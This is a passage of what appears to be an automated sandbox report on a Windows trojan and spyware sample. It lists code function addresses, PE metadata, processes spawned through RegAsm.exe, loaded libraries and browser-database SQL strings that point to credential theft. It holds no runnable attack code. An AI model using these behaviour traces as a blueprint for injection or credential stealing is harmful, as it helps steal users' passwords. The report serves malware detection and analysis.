                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C09F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,2_2_6C09F280
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01240C400_2_01240C40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042D9332_2_0042D933
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042D1C32_2_0042D1C3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041C4722_2_0041C472
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042D5612_2_0042D561
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041950A2_2_0041950A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042DD1B2_2_0042DD1B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042CD2E2_2_0042CD2E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041B7122_2_0041B712
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0935A02_2_6C0935A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C10AC002_2_6C10AC00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0D5C102_2_6C0D5C10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0E2C102_2_6C0E2C10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C10542B2_2_6C10542B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0A54402_2_6C0A5440
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C10545C2_2_6C10545C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0A6C802_2_6C0A6C80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0F34A02_2_6C0F34A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0FC4A02_2_6C0FC4A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0A64C02_2_6C0A64C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0BD4D02_2_6C0BD4D0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C09D4E02_2_6C09D4E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0D6CF02_2_6C0D6CF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0AFD002_2_6C0AFD00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0BED102_2_6C0BED10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0C05122_2_6C0C0512
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0D0DD02_2_6C0D0DD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0F85F02_2_6C0F85F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0E56002_2_6C0E5600
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0D7E102_2_6C0D7E10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0F9E302_2_6C0F9E30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0E2E4E2_2_6C0E2E4E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0B46402_2_6C0B4640
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0B9E502_2_6C0B9E50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0D3E502_2_6C0D3E50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C106E632_2_6C106E63
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C09C6702_2_6C09C670
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0FE6802_2_6C0FE680
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0B5E902_2_6C0B5E90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0F4EA02_2_6C0F4EA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1076E32_2_6C1076E3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C09BEF02_2_6C09BEF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0AFEF02_2_6C0AFEF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0A9F002_2_6C0A9F00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0D77102_2_6C0D7710
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0E77A02_2_6C0E77A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C09DFE02_2_6C09DFE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0C6FF02_2_6C0C6FF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0A78102_2_6C0A7810
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0DB8202_2_6C0DB820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0E48202_2_6C0E4820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0B88502_2_6C0B8850
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0BD8502_2_6C0BD850
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0DF0702_2_6C0DF070
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0C60A02_2_6C0C60A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1050C72_2_6C1050C7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0BC0E02_2_6C0BC0E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0D58E02_2_6C0D58E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0BA9402_2_6C0BA940
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C10B1702_2_6C10B170
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0AD9602_2_6C0AD960
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0EB9702_2_6C0EB970
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0D51902_2_6C0D5190
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0F29902_2_6C0F2990
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C09C9A02_2_6C09C9A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0CD9B02_2_6C0CD9B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0D9A602_2_6C0D9A60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C10BA902_2_6C10BA90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C102AB02_2_6C102AB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0922A02_2_6C0922A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0C4AA02_2_6C0C4AA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0ACAB02_2_6C0ACAB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0D8AC02_2_6C0D8AC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0B1AF02_2_6C0B1AF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0DE2F02_2_6C0DE2F0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0DD3202_2_6C0DD320
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0953402_2_6C095340
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0AC3702_2_6C0AC370
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C09F3802_2_6C09F380
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1053C82_2_6C1053C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C21AC302_2_6C21AC30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C206C002_2_6C206C00
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C14AC602_2_6C14AC60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C19ECD02_2_6C19ECD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C13ECC02_2_6C13ECC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2C8D202_2_6C2C8D20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C20ED702_2_6C20ED70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C26AD502_2_6C26AD50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1D6D902_2_6C1D6D90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C144DB02_2_6C144DB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2CCDC02_2_6C2CCDC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C220E202_2_6C220E20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1DEE702_2_6C1DEE70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1C6E902_2_6C1C6E90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C14AEC02_2_6C14AEC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1E0EC02_2_6C1E0EC0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C146F102_2_6C146F10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C280F202_2_6C280F20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C202F702_2_6C202F70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1AEF402_2_6C1AEF40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C288FB02_2_6C288FB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C14EFB02_2_6C14EFB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C21EFF02_2_6C21EFF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C140FE02_2_6C140FE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1908202_2_6C190820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1CA8202_2_6C1CA820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2148402_2_6C214840
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C2468E02_2_6C2468E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C1969002_2_6C196900
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004047E8 appears 38 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00410609 appears 71 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C0D94D0 appears 90 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004104E7 appears 36 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C0CCBE8 appears 134 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C2C09D0 appears 69 times
                        Source: file.exeStatic PE information: invalid certificate
                        Source: DAEBKKKEHD.exe.2.drStatic PE information: No import functions for PE file found
                        Source: ljhgfsd[1].exe.2.drStatic PE information: No import functions for PE file found
                        Source: DAEBKKKEHD.exe.2.drStatic PE information: Data appended to the last section found
                        Source: ljhgfsd[1].exe.2.drStatic PE information: Data appended to the last section found
                        Source: file.exe, 00000000.00000002.2058201350.000000000125E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
                        Source: file.exeBinary or memory string: OriginalFilenameVQP.exeD vs file.exe
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: DAEBKKKEHD.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: ljhgfsd[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/25@2/3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0F7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,2_2_6C0F7030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,2_2_004114A5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,2_2_00411807
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
                        Source: C:\Users\user\Desktop\file.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\delays.tmpJump to behavior
                        Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                        Source: JDGHII.2.dr, DAEBKK.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
